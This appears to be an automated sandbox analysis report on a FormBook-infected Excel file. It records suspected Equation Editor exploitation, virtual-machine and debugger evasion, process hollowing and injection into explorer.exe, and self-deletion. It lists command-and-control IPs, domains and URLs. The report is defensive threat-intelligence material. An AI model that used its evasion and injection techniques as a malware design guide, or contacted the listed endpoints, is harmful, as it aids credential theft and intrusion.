Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2344 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2796 Thread sleep time: -50634s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2876 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 504 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 3028 Thread sleep time: -34000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\chkdsk.exe Last function: Thread delayed
Source: explorer.exe, 00000007.00000000.2191376878.00000000082FD000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0y
Source: explorer.exe, 00000007.00000000.2183732159.0000000004234000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000007.00000000.2176510697.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000004.00000002.2175312527.00000000026B1000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2175312527.00000000026B1000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000007.00000000.2183732159.0000000004234000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000007.00000000.2191376878.00000000082FD000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000PctiT
Source: explorer.exe, 00000007.00000000.2183732159.0000000004234000.00000004.00000001.sdmp Binary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
Source: explorer.exe, 00000007.00000000.2183637257.00000000041AD000.00000004.00000001.sdmp Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: vbc.exe, 00000004.00000002.2175312527.00000000026B1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000007.00000002.2370693082.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: vbc.exe, 00000004.00000002.2175312527.00000000026B1000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_004088A0 rdtsc 6_2_004088A0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00409B10 LdrLoadDll, 6_2_00409B10
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_00840080 mov ecx, dword ptr fs:[00000030h] 6_2_00840080
Source: C:\Users\Public\vbc.exe Code function: 6_2_008400EA mov eax, dword ptr fs:[00000030h] 6_2_008400EA
Source: C:\Users\Public\vbc.exe Code function: 6_2_008626F8 mov eax, dword ptr fs:[00000030h] 6_2_008626F8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_025826F8 mov eax, dword ptr fs:[00000030h] 8_2_025826F8
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 199.34.228.73 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 94.73.146.42 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 35.246.6.109 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 54.254.26.94 80 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1388 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1388 Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Thread register set: target process: 1388 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 330000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: explorer.exe, 00000007.00000002.2370890876.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000007.00000002.2370890876.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.2176510697.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000002.2370890876.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 339199 Sample: NEW 01 13 2021.xlsx Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 54 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 14 other signatures 2->60 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 37 17 2->15         started        process3 dnsIp4 46 18.195.87.136, 49165, 80 AMAZON-02US United States 10->46 34 C:\Users\user\AppData\Local\...\file2[1].exe, PE32 10->34 dropped 36 C:\Users\Public\vbc.exe, PE32 10->36 dropped 72 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->72 17 vbc.exe 10->17         started        38 C:\Users\user\Desktop\~$NEW 01 13 2021.xlsx, data 15->38 dropped file5 signatures6 process7 signatures8 48 Machine Learning detection for dropped file 17->48 50 Tries to detect virtualization through RDTSC time measurements 17->50 52 Injects a PE file into a foreign processes 17->52 20 vbc.exe 17->20         started        23 vbc.exe 17->23         started        process9 signatures10 62 Modifies the context of a thread in another process (thread injection) 20->62 64 Maps a DLL or memory area into another process 20->64 66 Sample uses process hollowing technique 20->66 68 Queues an APC in another process (thread injection) 20->68 25 explorer.exe 20->25 injected process11 dnsIp12 40 www.acdfr.com 199.34.228.73, 49169, 80 WEEBLYUS United States 25->40 42 gdsjgf.com 34.102.136.180, 49166, 80 GOOGLEUS United States 25->42 44 12 other IPs or domains 25->44 70 System process connects to network (likely due to code injection or exploit) 25->70 29 chkdsk.exe 25->29         started        signatures13 process14 signatures15 74 Modifies the context of a thread in another process (thread injection) 29->74 76 Maps a DLL or memory area into another process 29->76 78 Tries to detect virtualization through RDTSC time measurements 29->78 32 cmd.exe 29->32         started        process16
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
18.195.87.136
 unknown United States
16509 AMAZON-02US true
35.246.6.109
 unknown United States
15169 GOOGLEUS true
34.102.136.180
 unknown United States
15169 GOOGLEUS true
199.34.228.73
 unknown United States
27647 WEEBLYUS true
94.73.146.42
 unknown Turkey
34619 CIZGITR true
54.254.26.94
 unknown United States
16509 AMAZON-02US false

Contacted Domains

Name IP Active
www.acdfr.com 199.34.228.73 true
ladi-dns-ssl-nlb-prod-1499fa9d75307fb9.elb.ap-southeast-1.amazonaws.com 54.254.26.94 true
td-balancer-euw2-6-109.wixdns.net 35.246.6.109 true
h2oturkiye.com 94.73.146.42 true
www.yjpps.com 0.0.0.0 true
gdsjgf.com 34.102.136.180 true
www.h2oturkiye.com unknown unknown
www.tuvandadayvitos24h.online unknown unknown
www.gdsjgf.com unknown unknown
www.thepoetrictedstudio.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.tuvandadayvitos24h.online/bw82/?UL0xqd7P=sK11/UrgtMzQflpEedkgmoVeFVcc0msB321R1Y3hRRerJh2xMoF4SxMycrpUJoIBhj5xCA==&CXi4A=gXrXRfH0yDoHcf- true
  • Avira URL Cloud: safe
 unknown
http://www.acdfr.com/bw82/?UL0xqd7P=34+qQ3LqqVk48isaIqrMS1QrJzDj13fhTkCMqePtkuCvgsCPLavUD/B/pRUk8yv0QOLVfQ==&CXi4A=gXrXRfH0yDoHcf- true
  • Avira URL Cloud: safe
 unknown